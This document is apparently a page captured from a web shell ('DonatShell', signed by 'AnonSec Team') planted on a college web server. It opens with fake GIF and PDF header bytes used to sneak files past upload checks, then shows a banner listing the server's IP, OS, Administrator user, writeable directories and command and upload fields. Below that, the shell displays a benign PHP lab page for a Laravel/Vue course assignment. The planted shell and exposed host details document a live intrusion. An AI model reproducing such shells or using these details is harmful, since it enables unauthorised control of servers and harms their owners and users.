GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2146/Labs/Lab04/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2146/Labs/Lab04//Lab04.phpinc
<?
// MichaelMalz/CST2146/Labs/Lab02.phpinc

$css .= ',colorCode.css';

#d_Var('$f_task',$f_task,'df');
#d_Var('$f_subtask',$f_subtask,'df');

// Process $f_subtask == 'Save path information'
if ( $f_task == 'Submit' && $f_subtask == 'Save path information' ) {
	$EvaluationSubmission_PROCESS = false;
	require('getLabInfo.phpinc');
	require('saveLabInfo.phpinc');
}
require('getLabInfo.phpinc');

$checkFileUpload = false;
#$showEvaluationVariables = true;
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

$disabled = '';
#$disabled = ' disabled';

$uploadFilename = $classNumber.'_'.$saveFilename.'.zip';
$UN = strtolower(substr($userFirstName,0,3).substr($userLastName,0,3));
$PW = $f_sId;

$ShowSpanCountBefore = false;
//$ShowSpanCountBefore = true;
// <span class="count">

#d_Var("\$_SESSION",$_SESSION,'d+');
#d_Var("\$_SESSION['CST2146']",$_SESSION['CST2146'],'d+');

?>
<fieldset><legend>Description</legend>
	The purpose of this lab is to setup your Seeders for the CST2146 project for class.
	<br>
	<span class="note normal">
		There are a lot of steps and variations that can happen and I will try to cover them below.
		<br>No matter what I do, you may need help to get this all working. 
		If you need help, don't be shy; Call me, or email me to set up a web meeting where we can talk.
	</span>
	<br>
	<?=$gradeNote?>
	<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<ol class="count">
	<li>*** Use laravel tools and conventions on this lab ***</li>
	<li>Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab.</li>
	<!-- 1 -->
	<li>Create the <a href="https://laravel.com/docs/10.x/controllers">Controllers</a> and VueJs index's for the following Pages.
		<ol>
			<li>index.vue requirements
				<ol>
					<li>Page must have a opening and closing template</li>
					<li>Template must have a parent div</li>
					<li>Page must have a script section to handle the props and functions</li>
					<li>Page must have a style section to handle the styles of page</li>
					<li>In the parent div type the name of the Page ex. Orders</li>
				</ol>
			</li>
			<li>Coupons
				<ol>
					<li>Create your CouponsController</li>
					<li>Add the resource to the routes/web.php</li>
					<li>Create your index.vue file in the resources/js/Pages/coupons/ folder. (You will need to create this folder)</li>
					<li>Add the link to Coupons in resources/js/Layouts/app.vue</li>
					<li>Take a screenshot of the page loaded in the and save it as <b class="copyText"><?=$saveFilename?>-coupons.png</b>.
						<br>
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/ScreenShot.png" width="900" height="405" alt=""/>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Customers
				<ol>
					<li>Create your CustomersController</li>
					<li>Add the resource to the routes/web.php</li>
					<li>Create your index.vue file in the resources/js/Pages/customers/ folder. (You will need to create this folder)</li>
					<li>Add the link to Customers in resources/js/Layouts/app.vue</li>
					<li>Take a screenshot of the page loaded in the and save it as <b class="copyText"><?=$saveFilename?>-customers.png</b>.
						<br>
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/ScreenShot.png" width="900" height="405" alt=""/>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Orders
				<ol>
					<li>Create your OrdersController</li>
					<li>Add the resource to the routes/web.php</li>
					<li>Create your index.vue file in the resources/js/Pages/orders/ folder. (You will need to create this folder)</li>
					<li>Add the link to Orders in resources/js/Layouts/app.vue</li>
					<li>Take a screenshot of the page loaded in the and save it as <b class="copyText"><?=$saveFilename?>-orders.png</b>.
						<br>
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/ScreenShot.png" width="900" height="405" alt=""/>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Products
				<ol>
					<li>Create your ProductsController</li>
					<li>Add the resource to the routes/web.php</li>
					<li>Create your index.vue file in the resources/js/Pages/products/ folder. (You will need to create this folder)</li>
					<li>Add the link to Products in resources/js/Layouts/app.vue</li>
					<li>Take a screenshot of the page loaded in the and save it as <b class="copyText"><?=$saveFilename?>-products.png</b>.
						<br>
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/ScreenShot.png" width="900" height="405" alt=""/>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Warehouses
				<ol>
					<li>Create your WarehousesController</li>
					<li>Add the resource to the routes/web.php</li>
					<li>Create your index.vue file in the resources/js/Pages/warehouses/ folder. (You will need to create this folder)</li>
					<li>Add the link to Warehouses in resources/js/Layouts/app.vue</li>
					<li>Take a screenshot of the page loaded in the and save it as <b class="copyText"><?=$saveFilename?>-warehouses.png</b>.
						<br>
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/ScreenShot.png" width="900" height="405" alt=""/>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
		</ol>
	</li>
	<!-- 2 -->
	<li>Commit your changes to your github branch. <b>Make sure to click Push Origin.</b></li>
	<!-- 3 -->
	<li>Turn in your assignment:
		<ol type="a">
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:
				<ul>
					<li><?=$saveFilename?>-coupons.png</li>
					<li><?=$saveFilename?>-customers.png</li>
					<li><?=$saveFilename?>-orders.png</li>
					<li><?=$saveFilename?>-products.png</li>
					<li><?=$saveFilename?>-warehouses.png</li>
				</ul>
			</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?> onclick="return checkFileUpload(this);"> for grading.</li>
		</ol>
	</li>
</ol>
	
<? if ( $disabled ) { ?>
<span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><br>
<? } ?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team